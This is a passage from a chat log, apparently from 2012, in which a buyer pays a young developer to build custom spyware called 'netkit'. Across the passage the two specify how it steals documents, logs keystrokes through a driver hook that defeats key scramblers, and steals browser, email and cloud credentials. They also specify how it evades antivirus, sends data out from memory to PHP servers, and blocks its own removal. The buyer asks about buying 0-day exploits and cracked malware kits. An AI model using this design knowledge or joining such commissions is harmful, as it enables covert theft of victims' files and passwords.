  715. [12/2/2012 4:19:08 PM] ' Tweety HF;: What are the directories you want to attack?
  716. [12/2/2012 4:19:18 PM] ' Tweety HF;: You don't want to send every file in the HDD do you?
  717. [12/2/2012 4:19:31 PM] Shelly Bongo: look in the txt
  718. [12/2/2012 4:19:45 PM] Shelly Bongo: - each cycle netkit will start by scanning the Recently Opened Documents folder (http://stackoverflow.com/questions/1287092/get-recent-documents-folder-in-net) - finding files that were not yet sent (or have been updated since being sent - their modification timestamp is different than that of the file that was sent - and are eligible to be resent) - starting from the most recently accessed file to the last
  719.   - in case there are no longer any documents in the recent-docs folder that can be sent, netkit shall scan other folders recursively according to a predefined list in the source code, the list (after Recent Documents) should be (taken from: http://msdn.microsoft.com/en-us/library/system.environment.specialfolder(v=vs.80).aspx): Desktop, MyDocuments
  720. [12/2/2012 4:20:02 PM] Shelly Bongo: start from Recent Documents, then go to a list of other directories: Desktop, then MyDocuments
  721. [12/2/2012 4:20:41 PM] ' Tweety HF;: So 3 locations only?
  722. [12/2/2012 4:21:38 PM] Shelly Bongo: yes
  723. [12/2/2012 4:22:12 PM] ' Tweety HF;: Does this include sub folders?
  724. [12/2/2012 4:22:14 PM] Shelly Bongo: in the future maybe do the whole HDD - the issue is, that the whole HDD will be noticable
  725. [12/2/2012 4:22:19 PM] Shelly Bongo: yes, recursively
  726. [12/2/2012 4:22:23 PM] Shelly Bongo: including subfolders
  727. [12/2/2012 4:22:29 PM] Shelly Bongo: but NOT including links (don't follow links)
  728. [12/2/2012 4:23:06 PM] ' Tweety HF;: Links? You mean short cuts? And the whol HDD will be a bad idea, if htye have 50 GB worth of data then it will upload it all onto your hosting..
  729. [12/2/2012 4:23:54 PM] Shelly Bongo: yes i mean don't follow short cuts
  730. [12/2/2012 4:24:01 PM] Shelly Bongo: sorry but did you read the txt?
  731. [12/2/2012 4:24:07 PM] ' Tweety HF;: Yeah I did
  732. [12/2/2012 4:24:15 PM] Shelly Bongo: okay
  733. [12/2/2012 4:24:25 PM] Shelly Bongo: even if we do the whole HDD - it won't send everything
  734. [12/2/2012 4:24:27 PM] Shelly Bongo: only matching files
  735. [12/2/2012 4:24:32 PM] ' Tweety HF;: Ok.
  736. [12/2/2012 4:24:37 PM] Shelly Bongo: - the conditions to determine if a file is to be sent:
  737.   - its filename matches one of the predefined regular expression patterns in the source - the default pattern list should contain two items: .doc & .xls
  738.   - it is not larger than FILER_MAX_FILESIZE bytes (default: 10 megabytes)
  739.   - it has not been sent before (or has been sent but with a different "last modified" timestamp"
  740. [12/2/2012 4:24:41 PM] Shelly Bongo: from the txt
  741. [12/2/2012 4:25:12 PM] ' Tweety HF;: Ok theirs 2 ways to do the last bit
  742. [12/2/2012 4:25:37 PM] ' Tweety HF;: 1 way is to write the sent files into a text file and encrypt + hide it.
  743. [12/2/2012 4:26:00 PM] ' Tweety HF;: second way is to write to the EOF of the file, it wont be noticable at all and nobody will know.
  744. [12/2/2012 4:26:33 PM] Shelly Bongo: writing to the EOF can screw up some filetypes, and it changes the mtime timestamp
  745. [12/2/2012 4:26:38 PM] Shelly Bongo: so lets go with #1
  746. [12/2/2012 4:28:58 PM] ' Tweety HF;: It dosn't change the file type at all and changing the timestamp is irelevant
  747. [12/2/2012 4:29:23 PM] Shelly Bongo: what do you mean? if a user has a .docx file
  748. [12/2/2012 4:29:36 PM] Shelly Bongo: and you start writing to the end of that file, it can become corrupt
  749. [12/2/2012 4:29:45 PM] Shelly Bongo: the user can receive warnings/errors when opening the file
  750. [12/2/2012 4:29:50 PM] Shelly Bongo: after it was altered by netkit
  751. [12/2/2012 4:30:04 PM] ' Tweety HF;: it dosn't effect the file, it dosn't corrupt.
  752. [12/2/2012 4:30:50 PM] Shelly Bongo: what if it's an avi file?
  753. [12/2/2012 4:30:56 PM] Shelly Bongo: what if it's jpeg?
  754. [12/2/2012 4:31:00 PM] ' Tweety HF;: No problem.
  755. [12/2/2012 4:31:01 PM] Shelly Bongo: can you guarantee it'll never corrupt?
  756. [12/2/2012 4:31:02 PM] ' Tweety HF;: Nothing will happen.
  757. [12/2/2012 4:31:04 PM] ' Tweety HF;: Yes.
  758. [12/2/2012 4:31:05 PM] Shelly Bongo: for all file types?
  759. [12/2/2012 4:31:10 PM] ' Tweety HF;: yup.
  760. [12/2/2012 4:35:39 PM] *** Shelly Bongo sent test-image.png ***
  761. [12/2/2012 4:35:55 PM] Shelly Bongo: please insert the text 'netkit' to the EOF of this file, without corrupting it
  762. [12/2/2012 4:36:02 PM] Shelly Bongo: here, it got corrupted
  763. [12/2/2012 4:36:30 PM] ' Tweety HF;: sec
  764. [12/2/2012 4:37:03 PM] Shelly Bongo: i want this feature to be generic - so if i'll want to add support for another filetype in the future, it should work without corruption
  765. [12/2/2012 4:38:40 PM] Shelly Bongo: forget the image, lets please do option #1
  766. [12/2/2012 4:40:04 PM] Shelly Bongo: by the way, you got the part regarding the modification time, right? so if the same file is sent, but later updated on the filesystem, it should be sent again - however if the modification time is the same as was already sent, it shouldn't
  767. [12/2/2012 4:40:16 PM] *** ' Tweety HF; sent test-image.png ***
  768. [12/2/2012 4:40:28 PM] ' Tweety HF;: written.
  769. [12/2/2012 4:41:26 PM] ' Tweety HF;: Open it with Notepad++ or something
  770. [12/2/2012 4:41:32 PM] ' Tweety HF;: you can see the EOF written.
  771. [12/2/2012 4:41:39 PM] Shelly Bongo: i saw it
  772. [12/2/2012 4:41:49 PM] Shelly Bongo: i still prefer option #1, it's more generic
  773. [12/2/2012 4:42:08 PM] ' Tweety HF;: The best way for a virus to spread is without dropping files
  774. [12/2/2012 4:42:16 PM] ' Tweety HF;: more files being dropped = AV will be suspicious
  775. [12/2/2012 4:43:12 PM] ' Tweety HF;: The only time I drop a file is to install the virus and add the start up keys.
  776. [12/2/2012 4:50:36 PM] Shelly Bongo: what if i will want to send out a .txt file?
  777. [12/2/2012 4:50:53 PM] Shelly Bongo: the user will see it was modified when he opens it in notepad?
  778. [12/2/2012 4:51:53 PM] Shelly Bongo: if you guarantee it'll work for doc/docx/ppt/pptx/xls/xlsx/txt/pdf/rtf - then lets go for the stealthy EOF method, otherwise option 1
  779. [12/2/2012 4:55:24 PM] ' Tweety HF;: Sec just testing a few things
  780. [12/2/2012 4:56:21 PM] Shelly Bongo: i'll be back in around 7 hours
  781. [12/2/2012 4:58:40 PM] ' Tweety HF;: sure
  782. [12/2/2012 7:10:56 PM] Shelly Bongo: hi
  783. [12/2/2012 7:10:59 PM] Shelly Bongo: back
  784. [12/2/2012 7:11:25 PM] Shelly Bongo: i wanted to ask regarding the pass stealers, what's the status with IE? i saw that some loggers don't support it yet, is it a challenge?
  785. [12/2/2012 7:12:17 PM] ' Tweety HF;: its not its just pointless because people dont use IE and if you want to steal the password still you need like 4-5 different versions based on the IE version
  786. [12/2/2012 7:12:23 PM] ' Tweety HF;: that increases the stub size by a lot
  787. [12/2/2012 7:14:30 PM] Shelly Bongo: "people dont use IE" is not a statement that reflects reality
  788. [12/2/2012 7:14:47 PM] Shelly Bongo: depends who your target is, and when you're not targeting tech-savvy people, they WILL use IE
  789. [12/2/2012 7:16:52 PM] Shelly Bongo: since IE 8-9-10 are the only relevant versions, you'd need 3 different versions for IE recovery at max
  790. [12/2/2012 7:22:13 PM] ' Tweety HF;: Alright I will whip up an IE module
  791. [12/2/2012 9:01:14 PM] Shelly Bongo: okay, so i think we have discussed most of the things needed for you to complete this, anyway i'm around (more or less) until you'll be done
  792. [12/2/2012 9:01:24 PM] ' Tweety HF;: Ok.
  793. [12/2/2012 9:01:35 PM] Shelly Bongo: which encryption do you plan on using? if possible AES 256 will be nice
  794. [12/2/2012 9:03:05 PM] Shelly Bongo: oh, and one more thing - and it's okay if you think it's out of scope of the project budget we agreed on - but if you can slip in credentials stealing for dropbox+googledrive+skydrive it'll be great
  795. [12/2/2012 9:03:28 PM] Shelly Bongo: i think that's it :)
  796. [12/2/2012 9:05:14 PM] ' Tweety HF;: Alright I will try throw them in
  797. [12/2/2012 9:05:18 PM] ' Tweety HF;: And AES 256 will be used.
  798. [12/3/2012 12:58:29 AM] Shelly Bongo: are you able to supply 0day vulnerabilities?
  799. [12/3/2012 12:58:51 AM] Shelly Bongo: for an unrelated project
  800. [12/3/2012 12:59:04 AM] ' Tweety HF;: I may be able to.
  801. [12/3/2012 12:59:51 AM] Shelly Bongo: hi
  802. [12/3/2012 1:01:35 AM] Shelly Bongo: that's vague
  803. [12/3/2012 1:01:45 AM] Shelly Bongo: IE, Acrobat...
  804. [12/3/2012 1:02:07 AM] Shelly Bongo: unpatched exploitable vulnerabilities
  805. [12/3/2012 1:02:22 AM] ' Tweety HF;: ill see what i can do after this project
  806. [12/3/2012 1:02:23 AM] Shelly Bongo: vlc/media player
  807. [12/3/2012 1:02:35 AM] Shelly Bongo: okay
  808. [12/3/2012 1:09:29 AM] Shelly Bongo: hmmm
  809. [12/3/2012 1:09:46 AM] Shelly Bongo: i gave your test.log file another view just now
  810. [12/3/2012 1:09:57 AM] Shelly Bongo: and noticed... you neglected to remove a few passwords
  811. [12/3/2012 1:10:01 AM] Shelly Bongo: FYI
  812. [12/3/2012 1:38:21 AM] Shelly Bongo: don't worry, i won't use it, i really want nothing more than get the product :)
  813. [12/3/2012 1:42:08 AM] Shelly Bongo: the good part is, the chrome stealer works perfectly fine
  814. [12/3/2012 4:10:31 PM] Shelly Bongo: any updates?
  815. [12/3/2012 11:39:26 PM] Shelly Bongo: ?
  816. [12/3/2012 11:39:28 PM] Shelly Bongo: ??
  817. [12/4/2012 12:32:57 AM] Shelly Bongo: hi
  818. [12/4/2012 12:33:02 AM] ' Tweety HF;: hihi
  819. [12/4/2012 12:33:16 AM] Shelly Bongo: i thought you ran away with my $150 :)
  820. [12/4/2012 12:33:34 AM] ' Tweety HF;: no no no lol
  821. [12/4/2012 12:33:55 AM] ' Tweety HF;: My family went off on holiday and college has resumed so I will only be online 3-4 hours a day during the night.
  822. [12/4/2012 12:34:24 AM] Shelly Bongo: okay
  823. [12/4/2012 12:34:35 AM] Shelly Bongo: i do hope we will be on schedule
  824. [12/4/2012 12:34:44 AM] ' Tweety HF;: yes we will no worries
  825. [12/4/2012 12:34:50 AM] Shelly Bongo: great
  826. [12/4/2012 12:35:25 AM] Shelly Bongo: so where are we standing? what's left to do?
  827. [12/4/2012 12:35:37 AM] Shelly Bongo: would you say we're 50% done?
  828. [12/4/2012 12:35:45 AM] Shelly Bongo: s/we're/you're/
  829. [12/4/2012 12:36:20 AM] ' Tweety HF;: 80% done
  830. [12/4/2012 12:36:51 AM] ' Tweety HF;: only thing left is the file stealing module and adding the stealers in, stealers are done but just need to be integrated
  831. [12/4/2012 12:39:41 AM | Edited 12:39:50 AM] Shelly Bongo: okay, after reaching 100% R&D (the php too) there's also testing left with your AV VMs
  832. [12/4/2012 12:39:58 AM] ' Tweety HF;: Deadline was saturday or sunday?
  833. [12/4/2012 12:40:03 AM] Shelly Bongo: sunday
  834. [12/4/2012 12:40:06 AM] ' Tweety HF;: ok
  835. [12/4/2012 1:21:12 AM] Shelly Bongo: are you aware of any loggers for mac by any chance?
  836. [12/4/2012 1:21:17 AM] Shelly Bongo: do you code for mac?
  837. [12/4/2012 1:21:30 AM] ' Tweety HF;: i actually dont sorry
  838. [12/4/2012 1:21:43 AM] Shelly Bongo: okay, it's not that important
  839. [12/4/2012 1:24:00 AM] Shelly Bongo: if i wish to find latest cracked spyeye, or citadel and such malware, what's a good site to look for this at? trojanforge, hf?
  840. [12/4/2012 1:24:21 AM] ' Tweety HF;: actually have no idea lol
  841. [12/4/2012 1:24:23 AM] ' Tweety HF;: trojanforge is good
  842. [12/4/2012 1:24:27 AM] ' Tweety HF;: and so is leakforums
  843. [12/4/2012 1:24:36 AM] Shelly Bongo: thanks, i'll see
  844. [12/5/2012 12:53:49 AM] Shelly Bongo: hey
  845. [12/5/2012 12:53:59 AM] Shelly Bongo: any updates?
  846. [12/5/2012 12:54:12 AM] ' Tweety HF;: Integrating some DLLs into it now :)
  847. [12/5/2012 1:00:19 AM] Shelly Bongo: why would it need DLLs?
  848. [12/5/2012 1:00:51 AM] ' Tweety HF;: I am making a C++ module for it to use
  849. [12/5/2012 1:00:58 AM] ' Tweety HF;: it will be more powerful and faster
  850. [12/5/2012 1:01:05 AM] ' Tweety HF;: the keylogger will be 10000x better lol
  851. [12/5/2012 1:02:54 AM] Shelly Bongo: is it too slow now?
  852. [12/5/2012 1:03:35 AM] ' Tweety HF;: Nope, not at all. But if it is in C++ it will be more powerful so no keys will be lost. That is my main goal.
  853. [12/5/2012 1:04:13 AM] Shelly Bongo: okay
  854. [12/5/2012 1:05:03 AM] ' Tweety HF;: That ok? I never planned to use C/C++ but I thought it will be better for you
  855. [12/5/2012 1:08:35 AM] Shelly Bongo: well one of the 3 features discussed is a keylogger
  856. [12/5/2012 1:08:56 AM] Shelly Bongo: so if you as the author feel like this is required to make it work well, it's your call
  857. [12/5/2012 1:09:14 AM] ' Tweety HF;: It is better for the application as it is 10000 x faster :)
  858. [12/5/2012 1:09:46 AM] Shelly Bongo: where is the keyboard hook installed to?
  859. [12/5/2012 1:10:01 AM] ' Tweety HF;: it hooks onto the keyboard driver
  860. [12/5/2012 1:10:16 AM] Shelly Bongo: and that doesn't require admin rights / uac?
  861. [12/5/2012 1:11:00 AM] ' Tweety HF;: nope
  862. [12/5/2012 1:17:18 AM] Shelly Bongo: interesting
  863. [12/5/2012 1:18:02 AM] ' Tweety HF;: Yup.
  864. [12/5/2012 1:18:03 AM] Shelly Bongo: so it hooks onto the driver, and proxies each key pressed onwards to its original keypress functions - while loggin each key beofre forwarding it
  865. [12/5/2012 1:18:05 AM] Shelly Bongo: ?
  866. [12/5/2012 1:18:07 AM] ' Tweety HF;: Yes.
  867. [12/5/2012 1:18:27 AM] ' Tweety HF;: It's very powerful and because its driver hooked it will be captured before sent to explorer.exe to be processed
  868. [12/5/2012 1:18:38 AM] ' Tweety HF;: meaning it bypasses all key scramblers
  869. [12/5/2012 1:19:19 AM] Shelly Bongo: if that's the case - then even if it's written in .net, and is slow - since it works as a proxy - it should never 'lose keys' - the worst case would be, it'd make things slow
  870. [12/5/2012 1:19:22 AM] Shelly Bongo: am i not correct?
  871. [12/5/2012 1:20:46 AM] ' Tweety HF;: it wont be slow at all.
  872. [12/6/2012 12:46:21 AM] Shelly Bongo: hi
  873. [12/6/2012 12:46:28 AM] ' Tweety HF;: Hello
  874. [12/6/2012 12:47:35 AM] Shelly Bongo: is it complex to make a builder for this tool? (e.g. loader, where you configure settings and it produces a ready-made exe, like some keyloggers have)
  875. [12/6/2012 12:47:45 AM] Shelly Bongo: i don't need it now, just wondering
  876. [12/6/2012 12:47:57 AM] Shelly Bongo: it seems like a huge complicated thing to me, since it's like writing your own compiler or something
  877. [12/6/2012 12:48:00 AM] Shelly Bongo: but i might be mistaken
  878. [12/6/2012 12:49:22 AM] ' Tweety HF;: No worries! I can make a builder if you'd like. But if its the source or doing confugrations your worried about i can make a text file for you to write them in and then compile using visual studio normally
  879. [12/6/2012 12:49:24 AM] ' Tweety HF;: or we can have builder.
  880. [12/6/2012 12:50:16 AM] Shelly Bongo: for this time i prefer the source code, i hope it has comments and is ordered
  881. [12/6/2012 12:50:26 AM] Shelly Bongo: i was just curious about 'builders'
  882. [12/6/2012 12:50:41 AM] Shelly Bongo: after this version is complete - i might want it as part of another project from you
  883. [12/6/2012 12:50:41 AM] ' Tweety HF;: it's not commented, but my source is extremely clean
  884. [12/6/2012 12:50:47 AM] ' Tweety HF;: no problem
  885. [12/6/2012 12:50:51 AM] ' Tweety HF;: do you want to look at the current code?
  886. [12/6/2012 12:50:53 AM] Shelly Bongo: (including other features/improvements)
  887. [12/6/2012 12:51:00 AM] Shelly Bongo: i'd love to
  888. [12/6/2012 12:51:02 AM] Shelly Bongo: TV?
  889. [12/6/2012 12:51:12 AM] ' Tweety HF;: Yes
  890. [12/6/2012 12:51:38 AM] ' Tweety HF;: 234 791 527
  891. [12/6/2012 12:51:40 AM] ' Tweety HF;: 3439
  892. [12/6/2012 12:52:35 AM] Shelly Bongo: oh it's in vb
  893. [12/6/2012 12:52:38 AM] Shelly Bongo: i thought it'll be in C#
  894. [12/6/2012 12:52:46 AM] ' Tweety HF;: I prefer writing in VB
  895. [12/6/2012 12:52:50 AM] ' Tweety HF;: You can convert it though
  896. [12/6/2012 12:52:58 AM] Shelly Bongo: okay
  897. [12/6/2012 12:53:02 AM] ' Tweety HF;: But it wont make a single difference
  898. [12/6/2012 12:53:07 AM] ' Tweety HF;: they both compile into MSIL code
  899. [12/6/2012 12:53:18 AM] Shelly Bongo: okay, it's not very important so long as it works well :)
  900. [12/6/2012 12:54:26 AM] Shelly Bongo: can you show the netkit file again, the beginning?
  901. [12/6/2012 12:54:27 AM] ' Tweety HF;: Will have it ready for sunday
  902. [12/6/2012 12:54:50 AM] Shelly Bongo: okay
  903. [12/6/2012 12:54:55 AM] ' Tweety HF;: look
  904. [12/6/2012 12:55:22 AM] ' Tweety HF;: nvm
  905. [12/6/2012 12:55:25 AM] ' Tweety HF;: it wil BSOD me lol..
  906. [12/6/2012 12:55:33 AM] Shelly Bongo: why?
  907. [12/6/2012 12:55:35 AM] Shelly Bongo: that's a big bug :)
  908. [12/6/2012 12:55:41 AM] ' Tweety HF;: not a bug at all
  909. [12/6/2012 12:55:42 AM] Shelly Bongo: don't want my "clients" bsod'ing
  910. [12/6/2012 12:55:47 AM] Shelly Bongo: okay
  911. [12/6/2012 12:56:03 AM] ' Tweety HF;: If they are not admin then they will get a message saying "access is denied, this is required for the system to run"
  912. [12/6/2012 12:56:11 AM] ' Tweety HF;: same as svchost.exe etc
  913. [12/6/2012 12:56:12 AM] Shelly Bongo: what?!
  914. [12/6/2012 12:56:14 AM] ' Tweety HF;: they all have that
  915. [12/6/2012 12:56:21 AM] ' Tweety HF;: all system processes have that
  916. [12/6/2012 12:56:24 AM] Shelly Bongo: i have other loggers which i bought, none of them does it
  917. [12/6/2012 12:56:33 AM] ' Tweety HF;: because this is process protection
  918. [12/6/2012 12:56:51 AM] Shelly Bongo: but me and you discussed that stealth is 1st priority, no messages
  919. [12/6/2012 12:56:58 AM] ' Tweety HF;: have you ever tried killing the process svchost.exe? services.exe? system?
  920. [12/6/2012 12:57:03 AM] ' Tweety HF;: this is tealth lol
  921. [12/6/2012 12:57:06 AM] ' Tweety HF;: stealth
  922. [12/6/2012 12:57:14 AM] ' Tweety HF;: critical processes = error messages
  923. [12/6/2012 12:57:18 AM] ' Tweety HF;: didnt you know that?
  924. [12/6/2012 12:57:21 AM] Shelly Bongo: sorry maybe i misunderstood - when did you say we'll get an error message?
  925. [12/6/2012 12:57:27 AM] ' Tweety HF;: look
  926. [12/6/2012 12:57:28 AM] Shelly Bongo: when a user tries to kill the process?
  927. [12/6/2012 12:57:53 AM] Shelly Bongo: oh okay!
  928. [12/6/2012 12:57:56 AM] ' Tweety HF;: Sometimes I need to kill a process which is giving me "Access denied" when trying to use the task manager or Process Explorer to kill. I am using Windows 7 64bit. I need to be able to kill such a process no matter what. It's not a Windows executable. Is there a "God" tool which I can use to override the kill protection?
  929. [12/6/2012 12:58:07 AM] ' Tweety HF;: your not allowed to kill critical processes
  930. [12/6/2012 12:58:09 AM] Shelly Bongo: i thought you meant - that when a non-admin user runs netkit they'll get the message
  931. [12/6/2012 12:58:17 AM] ' Tweety HF;: noooooooooo
  932. [12/6/2012 12:58:17 AM] Shelly Bongo: not when they try to kill the proc :)
  933. [12/6/2012 12:58:19 AM] ' Tweety HF;: lol
  934. [12/6/2012 12:58:27 AM] ' Tweety HF;: when they try kill it it will say critical process
  935. [12/6/2012 12:58:31 AM] Shelly Bongo: cool
  936. [12/6/2012 12:58:34 AM] ' Tweety HF;: when admin tries to kill it they will get BSOD
  937. [12/6/2012 12:58:40 AM] ' Tweety HF;: they will think its critical process
  938. [12/6/2012 12:58:43 AM] ' Tweety HF;: so they wont do it again
  939. [12/6/2012 12:59:03 AM] Shelly Bongo: yes, i understand what you mean now
  940. [12/6/2012 12:59:06 AM] ' Tweety HF;: ever tried killing system? it gives 15 seconds before it closes
  941. [12/6/2012 12:59:06 AM] ' Tweety HF;: :P
  942. [12/6/2012 12:59:13 AM] ' Tweety HF;: thats the netkit rooting system
  943. [12/6/2012 12:59:17 AM] Shelly Bongo: very nice
  944. [12/6/2012 12:59:27 AM] ' Tweety HF;: Very powerfull too :)
  945. [12/6/2012 12:59:55 AM] Shelly Bongo: looking at the code - it seems like you have a lot left - many more stealers, the file leaker code (which i think is a 'big one')... and the delivery code to the php (and the php itself)
  946. [12/6/2012 1:00:04 AM] Shelly Bongo: are you sure you'll be able to provide it on time?
  947. [12/6/2012 1:00:17 AM] ' Tweety HF;: Of course.
  948. [12/6/2012 1:00:32 AM] ' Tweety HF;: I have the PHP files written on my phone as I do them while in college/work
  949. [12/6/2012 1:00:36 AM] ' Tweety HF;: So its all ready
  950. [12/6/2012 1:00:46 AM] ' Tweety HF;: file stealer is something I will work o ntomorrow all day
  951. [12/6/2012 1:01:02 AM] ' Tweety HF;: stealers like outlook + thunderbird and messenging systems will be done tonight.
  952. [12/6/2012 1:01:07 AM] ' Tweety HF;: Everything is going smoothly.
  953. [12/6/2012 1:01:15 AM] Shelly Bongo: okay
  954. [12/6/2012 1:01:23 AM] ' Tweety HF;: output file:
  955. [12/6/2012 1:01:40 AM] ' Tweety HF;: currently 53 KB
  956. [12/6/2012 1:01:45 AM] ' Tweety HF;: max it will be is around 100 KB
  957. [12/6/2012 1:01:50 AM] ' Tweety HF;: is that fine with you or too big?
  958. [12/6/2012 1:01:58 AM] Shelly Bongo: that's perfect
  959. [12/6/2012 1:02:01 AM] ' Tweety HF;: Ok
  960. [12/6/2012 1:02:12 AM] Shelly Bongo: so the keyboard part is 100% done?
  961. [12/6/2012 1:02:17 AM] ' Tweety HF;: Yes.
  962. [12/6/2012 1:02:21 AM] Shelly Bongo: where does it store the logs?
  963. [12/6/2012 1:02:21 AM] ' Tweety HF;: Also
  964. [12/6/2012 1:02:31 AM] ' Tweety HF;: It will keep the files in memory
  965. [12/6/2012 1:02:37 AM] ' Tweety HF;: Everything will be done in memory
  966. [12/6/2012 1:02:43 AM] ' Tweety HF;: zip and password protect ALL files
  967. [12/6/2012 1:02:49 AM] ' Tweety HF;: in memory
  968. [12/6/2012 1:02:56 AM] ' Tweety HF;: then from a memory stream it will write to the php files
  969. [12/6/2012 1:02:59 AM] ' Tweety HF;: 100% stealth
  970. [12/6/2012 1:03:04 AM] ' Tweety HF;: no dropping
  971. [12/6/2012 1:03:06 AM] ' Tweety HF;: no evidence
  972. [12/6/2012 1:03:11 AM] Shelly Bongo: on the other hand it does not support offline logging
  973. [12/6/2012 1:03:12 AM] ' Tweety HF;: is that ok?
  974. [12/6/2012 1:03:18 AM] ' Tweety HF;: Yes it will
  975. [12/6/2012 1:03:32 AM] Shelly Bongo: you mean because it will eventually get sent out when it's back online?
  976. [12/6/2012 1:03:37 AM] ' Tweety HF;: It will store every zip file in memory until internet connection is found
  977. [12/6/2012 1:04:02 AM] ' Tweety HF;: Priorities are Stealth, Transfer and annomoty
  978. [12/6/2012 1:04:19 AM] ' Tweety HF;: Everything will be made sure to have all encrypted traffic hidden
  979. [12/6/2012 1:04:37 AM] ' Tweety HF;: I hope I am working at the standards you expect, is their anything else you require?
  980. [12/6/2012 1:05:08 AM] Shelly Bongo: i think there are some places where you were given 'creative freedom' here, and so far i like the directions you took
  981. [12/6/2012 1:05:39 AM] ' Tweety HF;: I appreciate that :)
  982. [12/6/2012 1:05:45 AM] Shelly Bongo: perhaps i'll have more comments about things like the transfer of files, etc. - when i see how it works
  983. [12/6/2012 1:05:51 AM] ' Tweety HF;: Sure.
  984. [12/6/2012 1:05:58 AM] Shelly Bongo: perhaps some tweaks on the php side (e.g. unzip all zipped content)
  985. [12/6/2012 1:06:06 AM] Shelly Bongo: send a php message upon installation
  986. [12/6/2012 1:06:06 AM] ' Tweety HF;: I will try to finish by saturday and finish all tests so you can have some last minute changes.
  987. [12/6/2012 1:06:14 AM] Shelly Bongo: upon "isdebugpresent()" etc
  988. [12/6/2012 1:06:20 AM] Shelly Bongo: great
  989. [12/6/2012 1:06:21 AM] ' Tweety HF;: I see, I can do that
  990. [12/6/2012 1:06:33 AM] ' Tweety HF;: Anything else?
  991. [12/6/2012 1:06:48 AM] Shelly Bongo: i think that's it so far, thanks for showing me your progress
  992. [12/6/2012 1:07:01 AM] ' Tweety HF;: No problem.
  993. [12/6/2012 1:07:57 AM] Shelly Bongo: do you mind giving me a short brief on how a builder is built? i mean, does it contain a VB compiler, that compiles the output exe? it sounds so complicated to me and you say it's a basic thing
  994. [12/6/2012 1:08:15 AM] Shelly Bongo: or point me to a good reading direction on the subject
  995. [12/6/2012 1:09:58 AM] ' Tweety HF;: The stub (Actual virus source) will have parameters set, and will be a text file. The builder edits the parameters to the users choices (like email and password for keyloggers) and then runs the source code into VBC.EXE (this is the main compiler that VB.NET uses) and it will compile the text file into the source code
  996. [12/6/2012 1:10:07 AM] ' Tweety HF;: the builder just replaces the parameters
  997. [12/6/2012 1:10:18 AM] ' Tweety HF;: in the source you will have email = ("[EMAILHERE]")
  998. [12/6/2012 1:10:27 AM] ' Tweety HF;: the builder will find that text, replace it with fkjdnfkjn@hotmail.com
  999. [12/6/2012 1:10:41 AM] Shelly Bongo: if that's how it works - whenever somebody sells a keylogger with builder, in fact the customers also have the full source code?
  1000. [12/6/2012 1:10:52 AM] Shelly Bongo: (sounds scary, from the author's perspective)
  1001. [12/6/2012 1:11:12 AM] ' Tweety HF;: yes they do
  1002. [12/6/2012 1:11:16 AM] ' Tweety HF;: but im smart, i have a cloud stub
  1003. [12/6/2012 1:11:32 AM] ' Tweety HF;: and the stub will not be present, the whole thing is written in the source
  1004. [12/6/2012 1:11:42 AM] ' Tweety HF;: like the builder WRITES the source code itself
  1005. [12/6/2012 1:11:44 AM] ' Tweety HF;: hehe
  1006. [12/6/2012 1:12:03 AM] ' Tweety HF;: look
  1007. [12/6/2012 1:12:03 AM] Shelly Bongo: in my project you are selling the source anyway so it's irrelevant
  1008. [12/6/2012 1:12:07 AM] Shelly Bongo: but still it's interesting
  1009. [12/6/2012 1:12:19 AM] Shelly Bongo: you know - i bought a keylogger, and when i open it in notepad++
  1010. [12/6/2012 1:12:26 AM] Shelly Bongo: i can see text of VB source code of stealers :)
  1011. [12/6/2012 1:12:36 AM] Shelly Bongo: (when i open the builder)
  1012. [12/6/2012 1:13:24 AM] ' Tweety HF;: yes but i will hide everything hehe
  1013. [12/6/2012 1:13:49 AM] Shelly Bongo: when? what do you mean?
  1014. [12/6/2012 1:14:06 AM] Shelly Bongo: to be clear - the deliverables of this project include full source code and everything
  1015. [12/6/2012 1:14:11 AM] Shelly Bongo: correct?
  1016. [12/6/2012 1:14:21 AM] *** ' Tweety HF; sent source.txt ***
  1017. [12/6/2012 1:14:30 AM] ' Tweety HF;: Yes
  1018. [12/6/2012 1:14:30 AM] ' Tweety HF;: Sec.
  1019. [12/6/2012 1:15:02 AM] Shelly Bongo: i will have the rest of the money ready for transfer on saturday
  1020. [12/6/2012 1:15:36 AM] ' Tweety HF;: Ok
  1021. [12/6/2012 1:15:38 AM] ' Tweety HF;: And try this
  1022. [12/6/2012 1:15:54 AM] *** ' Tweety HF; sent source.txt ***
  1023. [12/6/2012 1:16:04 AM] ' Tweety HF;: Take a look inside the text file, then save it on your desktop
  1024. [12/6/2012 1:16:08 AM] ' Tweety HF;: What does the content say?
  1025. [12/6/2012 1:16:36 AM] Shelly Bongo: Module testApp
  1026. sub main()
  1027. msgbox("CodeDOM is working with VBC.EXE!")
  1028. end sub
  1029.  
  1030. end module
  1031. [12/6/2012 1:16:40 AM] ' Tweety HF;: Yes
  1032. [12/6/2012 1:16:49 AM] ' Tweety HF;: Now open this Folder: C:\Windows\Microsoft.NET\Framework\v2.0.50727
  1033. [12/6/2012 1:17:00 AM] ' Tweety HF;: Opened?
  1034. [12/6/2012 1:17:08 AM] Shelly Bongo: yes
  1035. [12/6/2012 1:17:10 AM] Shelly Bongo: i see vbc
  1036. [12/6/2012 1:17:21 AM] ' Tweety HF;: DRAG and DROP the source.txt file into VBC.EXE
  1037. [12/6/2012 1:17:30 AM] ' Tweety HF;: Done?
  1038. [12/6/2012 1:17:39 AM] Shelly Bongo: yes, understood
  1039. [12/6/2012 1:17:40 AM] Shelly Bongo: :)
  1040. [12/6/2012 1:17:42 AM] Shelly Bongo: thanks
  1041. [12/6/2012 1:17:44 AM] ' Tweety HF;: Check your desktop
  1042. [12/6/2012 1:17:45 AM] Shelly Bongo: very cool
  1043. [12/6/2012 1:17:45 AM] ' Tweety HF;: :P
  1044. [12/6/2012 1:17:50 AM] ' Tweety HF;: This is what the builder does
  1045. [12/6/2012 1:17:53 AM] Shelly Bongo: this is just for VB though?
  1046. [12/6/2012 1:18:00 AM] Shelly Bongo: i mean, vbc.exe doen't compile c#?
  1047. [12/6/2012 1:18:23 AM] ' Tweety HF;: same thing is used for C#
  1048. [12/6/2012 1:18:25 AM] ' Tweety HF;: CBC.exe
  1049. [12/6/2012 1:18:34 AM] ' Tweety HF;: CSC*
  1050. [12/6/2012 1:18:41 AM] Shelly Bongo: oh
  1051. [12/6/2012 1:18:43 AM] Shelly Bongo: very interesting
  1052. [12/6/2012 1:18:59 AM] ' Tweety HF;: I also wrote a .NET file infector lol
  1053. [12/6/2012 1:19:12 AM] ' Tweety HF;: It uses CodeDOM and injects MSIL code into an assembly
  1054. [12/6/2012 1:19:16 AM] Shelly Bongo: do you mind me asking if you're above 30 or below?
  1055. [12/6/2012 1:19:21 AM] ' Tweety HF;: Im 18.
